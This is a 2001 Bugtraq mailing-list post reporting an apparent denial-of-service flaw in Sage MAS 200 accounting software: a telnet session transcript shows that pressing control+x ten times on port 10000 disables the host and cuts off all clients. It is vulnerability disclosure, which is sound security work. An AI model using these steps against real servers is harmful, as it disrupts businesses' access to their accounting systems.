[22367] in bugtraq
Bug in MAS90 Accounting Platform remote access?
daemon@ATHENA.MIT.EDU (Administrator)
Tue Aug 21 20:09:05 2001
Date: Tue, 21 Aug 2001 16:35:56 -0700
Message-ID: <BCC8282A57137A43BE52AB905B7DBAE20182CE@sbs.jfdi.com>
From: "Administrator" <Administrator@jfdi.com>
To: <bugtraq@securityfocus.com>
Greetings,
Not sure if any previous issues with this application have surfaced
here, but I've run
Sage Software's MAS 200 is an accounting platform which can be
configured to permit remote access to server-side data over TCP/IP. A
host application listens for connections on the server, and all remote
clients use a workstation app to interface with the host.
Running a port scanner determined that the MAS 200 host application
listens for connections on port 10000.....
telnet x.x.x.x port: 10000
Connected...
<enter>
"The host does not support this application"
<control + x> X 10 <enter>
"The host has been disabled"...
exit
telnet x.x.x.x port: 10000
Connected...
<enter>
"The host has been disabled"...
--------------------------------------------------------------
Checking the status of the host app at the server console revealed it
had indeed been switched to 'Disabled' status, and all access to the
server from clients on the LAN and WAN sides through the client application
had been suspended. Am I missing something here? Or is it way too easy
to DoS this software?